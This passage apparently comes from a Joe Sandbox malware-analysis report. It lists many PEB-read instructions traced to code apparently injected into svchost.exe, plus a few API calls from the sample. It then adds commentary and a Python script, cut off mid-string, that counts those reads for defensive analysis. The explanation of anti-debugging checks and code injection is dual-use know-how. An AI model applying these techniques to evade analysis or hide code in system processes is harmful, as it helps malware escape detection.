            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60124 mov eax, dword ptr fs:[00000030h]2_2_02F60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov ecx, dword ptr fs:[00000030h]2_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]2_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]2_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]2_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF0115 mov eax, dword ptr fs:[00000030h]2_2_02FF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB06F1 mov eax, dword ptr fs:[00000030h]2_2_02FB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB06F1 mov eax, dword ptr fs:[00000030h]2_2_02FB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_02F6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A6C7 mov eax, dword ptr fs:[00000030h]2_2_02F6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F666B0 mov eax, dword ptr fs:[00000030h]2_2_02F666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C6A6 mov eax, dword ptr fs:[00000030h]2_2_02F6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34690 mov eax, dword ptr fs:[00000030h]2_2_02F34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34690 mov eax, dword ptr fs:[00000030h]2_2_02F34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F62674 mov eax, dword ptr fs:[00000030h]2_2_02F62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF866E mov eax, dword ptr fs:[00000030h]2_2_02FF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF866E mov eax, dword ptr fs:[00000030h]2_2_02FF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A660 mov eax, dword ptr fs:[00000030h]2_2_02F6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A660 mov eax, dword ptr fs:[00000030h]2_2_02F6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4C640 mov eax, dword ptr fs:[00000030h]2_2_02F4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E627 mov eax, dword ptr fs:[00000030h]2_2_02F4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F66620 mov eax, dword ptr fs:[00000030h]2_2_02F66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68620 mov eax, dword ptr fs:[00000030h]2_2_02F68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3262C mov eax, dword ptr fs:[00000030h]2_2_02F3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72619 mov eax, dword ptr fs:[00000030h]2_2_02F72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE609 mov eax, dword ptr fs:[00000030h]2_2_02FAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F347FB mov eax, dword ptr fs:[00000030h]2_2_02F347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F347FB mov eax, dword ptr fs:[00000030h]2_2_02F347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]2_2_02F527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]2_2_02F527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]2_2_02F527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE7E1 mov eax, dword ptr fs:[00000030h]2_2_02FBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3C7C0 mov eax, dword ptr fs:[00000030h]2_2_02F3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB07C3 mov eax, dword ptr fs:[00000030h]2_2_02FB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F307AF mov eax, dword ptr fs:[00000030h]2_2_02F307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE47A0 mov eax, dword ptr fs:[00000030h]2_2_02FE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD678E mov eax, dword ptr fs:[00000030h]2_2_02FD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38770 mov eax, dword ptr fs:[00000030h]2_2_02F38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30750 mov eax, dword ptr fs:[00000030h]2_2_02F30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE75D mov eax, dword ptr fs:[00000030h]2_2_02FBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72750 mov eax, dword ptr fs:[00000030h]2_2_02F72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72750 mov eax, dword ptr fs:[00000030h]2_2_02F72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB4755 mov eax, dword ptr fs:[00000030h]2_2_02FB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6674D mov esi, dword ptr fs:[00000030h]2_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6674D mov eax, dword ptr fs:[00000030h]2_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6674D mov eax, dword ptr fs:[00000030h]2_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6273C mov eax, dword ptr fs:[00000030h]2_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6273C mov ecx, dword ptr fs:[00000030h]2_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6273C mov eax, dword ptr fs:[00000030h]2_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAC730 mov eax, dword ptr fs:[00000030h]2_2_02FAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C720 mov eax, dword ptr fs:[00000030h]2_2_02F6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C720 mov eax, dword ptr fs:[00000030h]2_2_02F6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30710 mov eax, dword ptr fs:[00000030h]2_2_02F30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60710 mov eax, dword ptr fs:[00000030h]2_2_02F60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C700 mov eax, dword ptr fs:[00000030h]2_2_02F6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F304E5 mov ecx, dword ptr fs:[00000030h]2_2_02F304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F644B0 mov ecx, dword ptr fs:[00000030h]2_2_02F644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBA4B0 mov eax, dword ptr fs:[00000030h]2_2_02FBA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F364AB mov eax, dword ptr fs:[00000030h]2_2_02F364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEA49A mov eax, dword ptr fs:[00000030h]2_2_02FEA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]2_2_02F5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]2_2_02F5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]2_2_02F5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC460 mov ecx, dword ptr fs:[00000030h]2_2_02FBC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEA456 mov eax, dword ptr fs:[00000030h]2_2_02FEA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2645D mov eax, dword ptr fs:[00000030h]2_2_02F2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5245A mov eax, dword ptr fs:[00000030h]2_2_02F5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A430 mov eax, dword ptr fs:[00000030h]2_2_02F6A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]2_2_02F2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]2_2_02F2E420
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F2C427 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h] (7x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h] (3x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h] (8x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F325E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F6C5ED mov eax, dword ptr fs:[00000030h] (2x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F365D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F6A5D0 mov eax, dword ptr fs:[00000030h] (2x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F6E5CF mov eax, dword ptr fs:[00000030h] (2x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F545B1 mov eax, dword ptr fs:[00000030h] (2x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h] (3x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F6E59C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F32582 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F32582 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F64588 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h] (3x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F38550 mov eax, dword ptr fs:[00000030h] (2x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h] (6x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h] (5x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FC6500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03004B00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F6AAEE mov eax, dword ptr fs:[00000030h] (2x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F30AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F64AD0 mov eax, dword ptr fs:[00000030h] (2x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h] (3x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F38AA0 mov eax, dword ptr fs:[00000030h] (2x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03002B57 mov eax, dword ptr fs:[00000030h] (4x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F86AA4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F68A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h] (9x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FACA72 mov eax, dword ptr fs:[00000030h] (2x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h] (3x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FDEA60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h] (7x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F40A5B mov eax, dword ptr fs:[00000030h] (2x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F54A35 mov eax, dword ptr fs:[00000030h] (2x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F6CA38 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F6CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F5EA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FBCA11 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h] (3x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F5EBFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FBCBF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FDEBD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h] (3x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h] (3x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F40BBE mov eax, dword ptr fs:[00000030h] (2x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FE4BB0 mov eax, dword ptr fs:[00000030h] (2x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03004A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F2CB7E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F28B50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FDEB50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FE4B4B mov eax, dword ptr fs:[00000030h] (2x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FC6B40 mov eax, dword ptr fs:[00000030h] (2x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FFAB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FD8B42 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F5EB20 mov eax, dword ptr fs:[00000030h] (2x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FF8B28 mov eax, dword ptr fs:[00000030h] (2x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h] (9x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F6C8F9 mov eax, dword ptr fs:[00000030h] (2x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FFA8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F5E8C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03004940 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FBC89D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F30887 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FBE872 mov eax, dword ptr fs:[00000030h] (2x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FC6870 mov eax, dword ptr fs:[00000030h] (2x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F60854 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F34859 mov eax, dword ptr fs:[00000030h] (2x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F42840 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h] (5x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F52835 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F6A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FD483A mov eax, dword ptr fs:[00000030h] (2x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FBC810 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F629F9 mov eax, dword ptr fs:[00000030h] (2x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FBE9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h] (6x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F649D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FFA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FC69C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FB89B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FB89B3 mov eax, dword ptr fs:[00000030h] (2x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h] (13x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F309AD mov eax, dword ptr fs:[00000030h] (2x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FD4978 mov eax, dword ptr fs:[00000030h] (2x)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FBC97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h] (3x)
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe  Code function: 1_2_008681F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe  Code function: 1_2_0083A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\hkLFB22XxS.exe  Code function: 1_2_0083A364 SetUnhandledExceptionFilter
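Every `mov reg, dword ptr fs:[00000030h]` entry above is a read of TEB.ProcessEnvironmentBlock: in a 32-bit or WoW64 process fs:[0x30] holds the PEB pointer, and that pointer is the first step of BeingDebugged (PEB+0x02), NtGlobalFlag (PEB+0x68) and Ldr-based API resolution (PEB+0x0C) alike. Which field is consumed afterwards is not visible in these lines, so the useful signal is where the reads cluster: the functions are all attributed to svchost.exe at 0x02F2xxxx to 0x0300xxxx, and the section below records an RWX section being mapped into svchost.exe, so they need not be svchost's own code. The script below is an added example, not part of the Joe Sandbox report; it tallies PEB reads per function from lines in the report's own format (a handful of lines are copied in as constructed sample input, plus one line in an assumed cleaned rendering with an "(Nx)" repeat count, and one non-PEB line that must be ignored) and reports the address window the functions occupy.

```python
"""Tally PEB reads ("mov reg, dword ptr fs:[00000030h]") per function from the
'Code function' lines of a Joe Sandbox report.  In a 32-bit or WoW64 process
fs:[0x30] is TEB.ProcessEnvironmentBlock, so each hit is one fresh PEB fetch;
which PEB field is consumed afterwards (BeingDebugged at +0x02, Ldr at +0x0C,
NtGlobalFlag at +0x68) is not visible in these lines."""
import re
from collections import Counter, defaultdict

# Accepts the report's raw rendering ("...svchost.exeCode function: ... fs:[00000030h]2_2_...")
# and a cleaned rendering with an optional "(Nx)" repeat count after the operand (assumed form).
PEB_READ_RE = re.compile(
    r"Source:\s*(?P<proc>.+?\.exe)\s*Code function:\s*(?P<fn>\d+_\d+_[0-9A-Fa-f]+)\s+"
    r"mov\s+(?P<reg>\w+),\s*dword ptr fs:\[00000030h\](?:\s*\((?P<n>\d+)x\))?"
)

SVCHOST = r"C:\Windows\SysWOW64\svchost.exe"

# Constructed sample: lines copied from the report, one line in the "(13x)" form,
# and one non-PEB line that must be skipped.
SAMPLE_LINES = r"""
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
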